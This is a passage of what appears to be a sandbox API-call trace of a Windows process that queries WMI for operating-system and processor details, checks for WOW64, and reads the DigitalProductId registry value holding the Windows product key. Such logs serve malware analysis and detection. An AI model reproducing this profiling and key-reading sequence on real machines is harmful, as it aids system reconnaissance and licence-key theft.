riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a134 | out: ppvObject=0x18a134*=0x0) returned 0x80004002 [0131.267] IUnknown:Release (This=0x75849c) returned 0x1 [0131.267] CoGetClassObject (in: rclsid=0x4bf972c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189aa0 | out: ppv=0x189aa0*=0x5930a10) returned 0x0 [0131.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930a10, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cb8 | out: ppvObject=0x189cb8*=0x0) returned 0x80004002 [0131.268] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5930a10, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ccc | out: ppvObject=0x189ccc*=0x593ff48) returned 0x0 [0131.268] WbemDefPath:IUnknown:Release (This=0x5930a10) returned 0x0 [0131.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898ec | out: ppvObject=0x1898ec*=0x593ff48) returned 0x0 [0131.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898a8 | out: ppvObject=0x1898a8*=0x0) returned 0x80004002 [0131.268] WbemDefPath:IUnknown:AddRef (This=0x593ff48) returned 0x3 [0131.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189204 | out: ppvObject=0x189204*=0x0) returned 0x80004002 [0131.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891b4 | out: ppvObject=0x1891b4*=0x0) returned 0x80004002 [0131.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891c0 | out: ppvObject=0x1891c0*=0x4b294e0) returned 0x0 [0131.270] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x4b294e0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891c8 | out: pCid=0x1891c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.270] WbemDefPath:IUnknown:Release (This=0x4b294e0) returned 0x3 [0131.270] CoGetContextToken (in: pToken=0x189220 | out: pToken=0x189220) returned 0x0 [0131.270] CoGetContextToken (in: pToken=0x189628 | out: pToken=0x189628) returned 0x0 [0131.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896b8 | out: ppvObject=0x1896b8*=0x0) returned 0x80004002 [0131.270] WbemDefPath:IUnknown:Release (This=0x593ff48) returned 0x2 [0131.270] WbemDefPath:IUnknown:Release (This=0x593ff48) returned 0x1 [0131.270] CoGetContextToken (in: pToken=0x189fb0 | out: pToken=0x189fb0) returned 0x0 [0131.270] CoGetContextToken (in: pToken=0x189f10 | out: pToken=0x189f10) returned 0x0 [0131.271] WbemDefPath:IUnknown:QueryInterface (in: This=0x593ff48, riid=0x189fe0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189fdc | out: ppvObject=0x189fdc*=0x593ff48) returned 0x0 [0131.271] WbemDefPath:IUnknown:AddRef (This=0x593ff48) returned 0x3 [0131.271] WbemDefPath:IUnknown:Release (This=0x593ff48) returned 0x2 [0131.271] WbemDefPath:IWbemPath:SetText (This=0x593ff48, uMode=0x4, pszPath="\\\\YKYD69Q\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"YKYD69Q\"") returned 0x0 [0131.271] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a164 | out: puCount=0x18a164*=0x2) returned 0x0 [0131.271] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a160*=0x0, pszText=0x0 | out: puBuffLength=0x18a160*=0xf, pszText=0x0) returned 0x0 [0131.271] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a160*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a160*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0131.273] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a12c | out: puCount=0x18a12c*=0x2) returned 0x0 [0131.273] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a128*=0x0, pszText=0x0 | out: puBuffLength=0x18a128*=0xf, pszText=0x0) returned 0x0 [0131.273] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a128*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a128*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0131.273] IWbemClassObject:Get (in: This=0x593d2e0, wszName="Caption", lFlags=0, pVal=0x18a128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26cc6cc*=0, plFlavor=0x26cc6d0*=0 | out: pVal=0x18a128*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x26cc6cc*=8, plFlavor=0x26cc6d0*=32) returned 0x0 [0131.273] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0131.273] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0131.273] IWbemClassObject:Get (in: This=0x593d2e0, wszName="Caption", lFlags=0, pVal=0x18a130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26cc6cc*=8, plFlavor=0x26cc6d0*=32 | out: pVal=0x18a130*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x26cc6cc*=8, plFlavor=0x26cc6d0*=32) returned 0x0 [0131.274] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0131.274] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0131.277] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75b90000 [0131.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x18a158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessVsÝ\x8b\x07È\x94ÂAt ¦\x18", lpUsedDefaultChar=0x0) returned 14 [0131.277] GetProcAddress (hModule=0x75b90000, lpProcName="IsWow64Process") returned 0x75ba195e [0131.277] GetCurrentProcess () returned 0xffffffff [0131.277] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18a1b8 | out: Wow64Process=0x18a1b8) returned 1 [0131.294] CoGetContextToken (in: pToken=0x18a038 | out: pToken=0x18a038) returned 0x0 [0131.294] WbemLocator:IUnknown:Release (This=0x4b2fdbc) returned 0x1 [0131.294] IUnknown:Release (This=0x593d2a4) returned 0x0 [0131.370] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75b90000 [0131.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x18a184, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessVsÝ\x8b\x07È\x94ÂAt ¦\x18", lpUsedDefaultChar=0x0) returned 14 [0131.371] GetProcAddress (hModule=0x75b90000, lpProcName="IsWow64Process") returned 0x75ba195e [0131.371] GetCurrentProcess () returned 0xffffffff [0131.371] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18a1e4 | out: Wow64Process=0x18a1e4) returned 1 [0131.375] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x18a19c | out: phkResult=0x18a19c*=0x414) returned 0x0 [0131.377] RegQueryValueExW (in: hKey=0x414, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x18a1bc, lpData=0x0, lpcbData=0x18a1b8*=0x0 | out: lpType=0x18a1bc*=0x3, lpData=0x0, lpcbData=0x18a1b8*=0xa4) returned 0x0 [0131.377] RegQueryValueExW (in: hKey=0x414, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x18a1bc, lpData=0x26cdcfc, lpcbData=0x18a1b8*=0xa4 | out: lpType=0x18a1bc*=0x3, lpData=0x26cdcfc*, lpcbData=0x18a1b8*=0xa4) returned 0x0 [0131.487] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a17c | out: puCount=0x18a17c*=0x2) returned 0x0 [0131.487] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a178*=0x0, pszText=0x0 | out: puBuffLength=0x18a178*=0xf, pszText=0x0) returned 0x0 [0131.487] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a178*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0131.488] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a104 | out: ppv=0x18a104*=0x75849c) returned 0x0 [0131.488] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a0fc | out: pAptType=0x18a0fc*=1) returned 0x0 [0131.488] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a100 | out: ppvObject=0x18a100*=0x0) returned 0x80004002 [0131.488] IUnknown:Release (This=0x75849c) returned 0x1 [0131.489] CoGetClassObject (in: rclsid=0x4bf975c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d20 | out: ppv=0x189d20*=0x593d218) returned 0x0 [0131.489] WbemLocator:IUnknown:QueryInterface (in: This=0x593d218, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x0) returned 0x80004002 [0131.489] WbemLocator:IClassFactory:CreateInstance (in: This=0x593d218, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f4c | out: ppvObject=0x189f4c*=0x593d230) returned 0x0 [0131.489] WbemLocator:IUnknown:Release (This=0x593d218) returned 0x0 [0131.489] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b6c | out: ppvObject=0x189b6c*=0x593d230) returned 0x0 [0131.489] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b28 | out: ppvObject=0x189b28*=0x0) returned 0x80004002 [0131.489] WbemLocator:IUnknown:AddRef (This=0x593d230) returned 0x3 [0131.489] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189484 | out: ppvObject=0x189484*=0x0) returned 0x80004002 [0131.489] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189434 | out: ppvObject=0x189434*=0x0) returned 0x80004002 [0131.489] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189440 | out: ppvObject=0x189440*=0x0) returned 0x80004002 [0131.489] CoGetContextToken (in: pToken=0x1894a0 | out: pToken=0x1894a0) returned 0x0 [0131.490] CoGetContextToken (in: pToken=0x1898a8 | out: pToken=0x1898a8) returned 0x0 [0131.490] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189938 | out: ppvObject=0x189938*=0x0) returned 0x80004002 [0131.490] WbemLocator:IUnknown:Release (This=0x593d230) returned 0x2 [0131.490] WbemLocator:IUnknown:Release (This=0x593d230) returned 0x1 [0131.490] CoGetContextToken (in: pToken=0x189f18 | out: pToken=0x189f18) returned 0x0 [0131.490] CoGetContextToken (in: pToken=0x189e78 | out: pToken=0x189e78) returned 0x0 [0131.490] WbemLocator:IUnknown:QueryInterface (in: This=0x593d230, riid=0x189f48*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f44 | out: ppvObject=0x189f44*=0x593d230) returned 0x0 [0131.490] WbemLocator:IUnknown:AddRef (This=0x593d230) returned 0x3 [0131.490] WbemLocator:IUnknown:Release (This=0x593d230) returned 0x2 [0131.490] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a0e0 | out: puCount=0x18a0e0*=0x2) returned 0x0 [0131.490] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=8, puBuffLength=0x18a0dc*=0x0, pszText=0x0 | out: puBuffLength=0x18a0dc*=0xf, pszText=0x0) returned 0x0 [0131.490] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=8, puBuffLength=0x18a0dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a0dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0131.490] CoCreateInstance (in: rclsid=0x74f61284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74f612e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189fb8 | out: ppv=0x189fb8*=0x593d218) returned 0x0 [0131.490] WbemLocator:IWbemLocator:ConnectServer (in: This=0x593d218, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a04c | out: ppNamespace=0x18a04c*=0x593d2bc) returned 0x0 [0131.502] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2bc, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee8 | out: ppvObject=0x189ee8*=0x4b30164) returned 0x0 [0131.502] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x4b30164, pProxy=0x593d2bc, pAuthnSvc=0x189f38, pAuthzSvc=0x189f34, pServerPrincName=0x189f2c, pAuthnLevel=0x189f30, pImpLevel=0x189f20, pAuthInfo=0x189f24, pCapabilites=0x189f28 | out: pAuthnSvc=0x189f38*=0xa, pAuthzSvc=0x189f34*=0x0, pServerPrincName=0x189f2c, pAuthnLevel=0x189f30*=0x6, pImpLevel=0x189f20*=0x2, pAuthInfo=0x189f24, pCapabilites=0x189f28*=0x1) returned 0x0 [0131.502] WbemLocator:IUnknown:Release (This=0x4b30164) returned 0x1 [0131.502] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2bc, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189edc | out: ppvObject=0x189edc*=0x4b30184) returned 0x0 [0131.502] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2bc, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ed8 | out: ppvObject=0x189ed8*=0x4b30164) returned 0x0 [0131.502] WbemLocator:IClientSecurity:SetBlanket (This=0x4b30164, pProxy=0x593d2bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0131.502] WbemLocator:IUnknown:Release (This=0x4b30164) returned 0x2 [0131.502] WbemLocator:IUnknown:Release (This=0x4b30184) returned 0x1 [0131.502] CoTaskMemFree (pv=0x4bf9990) [0131.502] WbemLocator:IUnknown:Release (This=0x593d218) returned 0x0 [0131.503] WbemLocator:IUnknown:QueryInterface (in: This=0x593d2bc, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ad8 | out: ppvObject=0x189ad8*=0x4b30184) returned 0x0 [0131.503] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a94 | out: ppvObject=0x189a94*=0x0) returned 0x80004002 [0131.503] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898b4 | out: ppvObject=0x1898b4*=0x0) returned 0x80004002 [0131.503] WbemLocator:IUnknown:AddRef (This=0x4b30184) returned 0x3 [0131.503] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893f4 | out: ppvObject=0x1893f4*=0x0) returned 0x80004002 [0131.504] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893a4 | out: ppvObject=0x1893a4*=0x0) returned 0x80004002 [0131.504] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893b0 | out: ppvObject=0x1893b0*=0x4b300e4) returned 0x0 [0131.504] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b300e4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1893b8 | out: pCid=0x1893b8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.504] WbemLocator:IUnknown:Release (This=0x4b300e4) returned 0x3 [0131.504] CoGetContextToken (in: pToken=0x189410 | out: pToken=0x189410) returned 0x0 [0131.504] CoGetContextToken (in: pToken=0x189818 | out: pToken=0x189818) returned 0x0 [0131.504] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898a8 | out: ppvObject=0x1898a8*=0x4b3016c) returned 0x0 [0131.504] WbemLocator:IRpcOptions:Query (in: This=0x4b3016c, pPrx=0x4b30184, dwProperty=2, pdwValue=0x1898d0 | out: pdwValue=0x1898d0) returned 0x80004002 [0131.504] WbemLocator:IUnknown:Release (This=0x4b3016c) returned 0x3 [0131.504] WbemLocator:IUnknown:Release (This=0x4b30184) returned 0x2 [0131.504] CoGetContextToken (in: pToken=0x189de8 | out: pToken=0x189de8) returned 0x0 [0131.504] CoGetContextToken (in: pToken=0x189d48 | out: pToken=0x189d48) returned 0x0 [0131.504] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x189e18*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189e14 | out: ppvObject=0x189e14*=0x593d2bc) returned 0x0 [0131.504] WbemLocator:IUnknown:AddRef (This=0x593d2bc) returned 0x4 [0131.504] WbemLocator:IUnknown:Release (This=0x593d2bc) returned 0x3 [0131.505] WbemLocator:IUnknown:Release (This=0x593d2bc) returned 0x2 [0131.505] SysStringLen (param_1=0x0) returned 0x0 [0131.505] CoGetContextToken (in: pToken=0x189de0 | out: pToken=0x189de0) returned 0x0 [0131.505] WbemLocator:IUnknown:AddRef (This=0x4b30184) returned 0x3 [0131.505] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30184, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c74 | out: ppvObject=0x189c74*=0x4b30184) returned 0x0 [0131.505] WbemLocator:IUnknown:Release (This=0x4b30184) returned 0x3 [0131.505] WbemLocator:IUnknown:Release (This=0x4b30184) returned 0x2 [0131.505] CoGetContextToken (in: pToken=0x189ed8 | out: pToken=0x189ed8) returned 0x0 [0131.505] WbemLocator:IUnknown:AddRef (This=0x593d2bc) returned 0x3 [0131.505] IWbemServices:ExecQuery (in: This=0x593d2bc, strQueryLanguage="WQL", strQuery="SELECT * FROM WIN32_PROCESSOR", lFlags=16, pCtx=0x0, ppEnum=0x18a0e8 | out: ppEnum=0x18a0e8*=0x593da84) returned 0x0 [0131.518] IUnknown:QueryInterface (in: This=0x593da84, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f4c | out: ppvObject=0x189f4c*=0x593da88) returned 0x0 [0131.518] IClientSecurity:QueryBlanket (in: This=0x593da88, pProxy=0x593da84, pAuthnSvc=0x189f9c, pAuthzSvc=0x189f98, pServerPrincName=0x189f90, pAuthnLevel=0x189f94, pImpLevel=0x189f84, pAuthInfo=0x189f88, pCapabilites=0x189f8c | out: pAuthnSvc=0x189f9c*=0xa, pAuthzSvc=0x189f98*=0x0, pServerPrincName=0x189f90, pAuthnLevel=0x189f94*=0x6, pImpLevel=0x189f84*=0x2, pAuthInfo=0x189f88, pCapabilites=0x189f8c*=0x1) returned 0x0 [0131.518] IUnknown:Release (This=0x593da88) returned 0x1 [0131.518] IUnknown:QueryInterface (in: This=0x593da84, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f40 | out: ppvObject=0x189f40*=0x4b30094) returned 0x0 [0131.518] IUnknown:QueryInterface (in: This=0x593da84, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x593da88) returned 0x0 [0131.518] IClientSecurity:SetBlanket (This=0x593da88, pProxy=0x593da84, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0131.520] IUnknown:Release (This=0x593da88) returned 0x2 [0131.520] WbemLocator:IUnknown:Release (This=0x4b30094) returned 0x1 [0131.520] CoTaskMemFree (pv=0x4bf9930) [0131.520] IUnknown:QueryInterface (in: This=0x593da84, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, 